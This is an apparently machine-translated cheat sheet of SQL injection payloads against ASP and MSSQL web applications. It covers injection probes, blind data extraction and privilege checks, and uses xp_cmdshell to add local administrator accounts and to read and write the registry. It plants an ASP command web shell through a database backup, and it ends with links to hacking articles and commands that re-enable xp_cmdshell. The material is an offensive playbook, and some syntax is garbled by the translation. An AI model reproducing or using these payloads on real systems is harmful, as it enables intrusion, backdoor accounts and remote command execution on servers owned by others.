1. Judging whether there is an injection
; and 1 = 1
And 1 = 2
2. Preliminary judgment is MSSQL
And user> 0
3. Judgment the database system
; and (select count (*) from sysobjects> 0 mssql
; and (select count (*) from msysobjects> 0 access
4. Injection parameters are characters
'and [query conditions] and' '='
5. No filtered parameters
'and [query conditions] and'% 25 '='
6. Guess the database
; and (select count (*) from [Database Name])> 0
7. Guess field
; and (Select Count) from Database Name)> 0
8. Recording length in the guess field
; and (SELECT TOP 1 LEN (Field Name) from Database Name)> 0
9. (1) Guess the ASCII value of the field (Access)
; and (SELECT TOP 1 ASC (MID (Field Name, 1, 1)) from Database Name)> 0
(2) Guess the ASCII value of the field (MSSQL)
; and (SUBSTRING 1 Unicode (Substring (Field Name, 1, 1)) from Database Name)> 0
10. Test permission structure (MSSQL)
And 1 = (select is_srvrolemember ('sysadmin'));
And 1 = (select is_srvrolemember ('serveradmin'));
And 1 = (Select is_srvrolemember ('setupadmin'));
And 1 = (SELECT IS_SRVROLEMEMBER ('SecurityAdmin'));
And 1 = (Select is_srvrolemember ('diskdmin'));
And 1 = (select is_srvrolemember ('bulkadmin'));
And 1 = (select is_member ('db_owner'));
11. Add MSSQL and system accounts
EXEC MASTER.DBO.SP_ADDLOGIN UserName;
EXEC MASTER.DBO.SP_Password Null, UserName, Password;
; exec master.dbo.sp_addsrvrolemember system sysadmin username;
EXEC MASTER.DBO.XP_CMDSHELL 'NET USER UserName Password / Workstations: * / Times: All / Passwordchg: Yes / PasswordReq: Yes / Active: Yes / Add';
; exec master.dbo.xp_cmdshell 'net user username password / add';
; exec master.dbo.xp_cmdshell 'net localgroup administrators username / add';
12. (1) Traverse
Create Table DIRS (Paths Varchar (100), ID INT)
Insert Dirs Exec Master.dbo.xp_dirtree 'C: /'
; and (SELECT TOP 1 Paths from DIRS)> 0
; and (Select Top 1 Paths from DIRS Where Paths Not in ('getting received by Paths')>)
(2) Traversing a directory
Create Table Temp (ID NVARCHAR (255), Num1 Nvarchar (255), Num2 NVARCHAR (255), Num3 NVARCHAR (255));
INSERT TEMP EXEC MASTER.DBO.XP_AVAILAMEDIA; - Get all current drives
; INSERT INTO TEMP (ID) EXEC MASTER.DBO.XP_SUBDIRS 'C: /'; - Get subdirectory list
Insert INTO TEMP (ID, NUM1) Exec Master.dbo.xp_dirtree 'C: /'; - Get all subdirectories directory tree structure
Insert INTO TEMP (ID) Exec Master.dbo.xp_cmdshell 'Type C: /Web/index.asp'; - Viewing the contents of the file
13.MSSQL stored procedure
XP_REGENUMVALUES registration table root key, subkey
; EXEC XP_REGENUMVALUES 'HKEY_LOCAL_MACHINE', 'Software / Microsoft / Windows / CurrentVersion / Run' Returns all key values in multiple recordsets
XP_REGREAD Roots, Subys, Key Values
EXEC XP_REGREAD ',' SOFTWARE / Microsoft / Windows / CurrentVersion ',' CommonFileSDir 'Returns the value of the set key
XP_REGWRITE root key, subkey, value name, value type, value
Value type has two reg_sz represents a character type, REG_DWORD represents integer
EXEC XP_REGWRITE 'HKEY_LOCAL_MACHINE', 'Software / Microsoft / Windows / CurrentVersion', 'TestValuename', 'REG_SZ', 'Hello' Write Registration
XP_REGDELETEVALUE root key, subkey, value name
EXEC XP_REGDELETEVALUE 'HKEY_LOCAL_MACHINE', 'Software / Microsoft / Windows / CurrentVersion', 'TestValuename' Deletes a value
XP_REGDELETEKEY 'HKEY_LOCAL_MACHINE', 'Software / Microsoft / Windows / CurrentVersion / TestKey' Delete key, including all values under this key
14.MSSQL's Backup Create WebShell
Use model
Create Table CMD (STR Image);
INSERT INTO CMD (STR) VALUES ('<% DIM OSCRIPT%>);
Backup Database Model to Disk = 'c: /l.asp';
15.MSSQL built-in function
; and (select @@ version)> 0 get the version number of Windows
And user_name () = 'dbo' Judging the connection user of the current system is SA
And (select user_name ()> 0 connection user of the current system
And (select db_name ())> 0 Get the currently connected database
16. Simple WebShell
Use modelcreate Table CMD (STR Image);
Insert INTO CMD (STR) VALUES ('<% = Server.createObject ("wscript.shell"). EXEC ("cmd.exe / c" & request ("c")). stdout.readall%>');
Backup Database Model to Disk = 'g: /wwward/l.asp';
When you ask, like this:
http://ip/l.asp? c = DIR
SQL injection book - ASP injection vulnerability full contact (small bamboo)
http://fox.163n.com/xyhack/hhh/list.asp?id=222
MSSQL cross-library query (smelly! Black night)
http://fox.163n.com/xyhack/hhh/list.asp?id=66
Dry MS SQL last drop
http://fox.163n.com/xyhack/hhh/list.asp?id=309
SQL statement reference and record set object detailed
http://fox.163n.com/xyhack/hhh/list.asp?id=124
About SQL Server stored procedures
http://fox.163n.com/xyhack/hhh/list.asp?id=314
Create WebShell with MSSQL Backup
http://fox.163n.com/xyhack/hhh/list.asp?id=219
SQL_INJECTION Advanced Application
http://fox.163n.com/xyhack/hhh/list.asp?id=221
Cross-station SQL injection (Laokai)
http://fox.163n.com/xyhack/hhh/list.asp?id=383
Weird SQL Injection (AMANL)
http://fox.163n.com/xyhack/hhh/list.asp?id=320
Advanced sql injection in the SQL Server application (translation: Qingyan Zhi Wolf)
http://fox.163n.com/xyhack/hhh/list.asp?id=338
How to use SQL into the traversal catalog (SINKA QQ: 20355)
http://fox.163n.com/xyhack/hhh/list.asp?id=316
SQL INJECTION Skills (Translator: Demonalex)
http://fox.163n.com/xyhack/hhh/list.asp?id=301
Some attacks in the SQL database
http://fox.163n.com/xyhack/hhh/list.asp?id=152
SQL INJECTION Attack Technology (JSW)
http://fox.163n.com/xyhack/hhh/list.asp?id=208
SQL_INJECTION Advanced Application (APACHY)
http://fox.163n.com/xyhack/hhh/list.asp?id=221
Uncommonweight method for SQL injection (Guilin veterans)
http://fox.163n.com/xyhack/hhh/list.asp?id=231
Backup a shell
http://fox.163n.com/xyhack/hhh/list.asp?id=274
Talking about PHP MySQL Syringe Schematic (Black Black · ≯super · HEI)
http://fox.163n.com/xyhack/hhh/list.asp?id=386
Advanced SQL Injection with MySQL (Angel)
http://fox.163n.com/xyhack/hhh/list.asp?id=405l'Injection (my) SQL VIA PHP
http://fox.163n.com/xyhack/hhh/list.asp?id=420
Oracle SQL language
http://fox.163n.com/xyhack/hhh/list.asp?id=206
Prerequisites Require tools: SQL Query Analyzer and SQLEXEC SUNX VERSION
1. The way to remove the XP_cmdshell extension process is to use the following statement:
If EXISTS (Select * from dbo.sysObjects where id = Object_id (n '[dbo]. [xpcmdshell]') And ObjectProperty (id, n'iseXtendedProc ') = 1)
EXEC SP_DROPEXTENDEDPROC N '[DBO]. [XP_CMDSHELL]'
2. The way to add the XP_cmdshell extension process is to use the following statement:
(1) SQL Query Analyzer
sp_addextendedProc XP_cmdshell, @ dllname = 'xplog70.dll'
(2) First fill in the% s in the Format option of SQLEXEC Sunx Version, enter in the CMD option
sp_addextendedProc 'XP_cmdshell', 'XPSQL70.DLL'
Removal
sp_dropextendedProc 'XP_cmdshell'
(3) MSSQL2000
Sp_addextendedProc 'XP_cmdshell', 'XPLog70.dll'
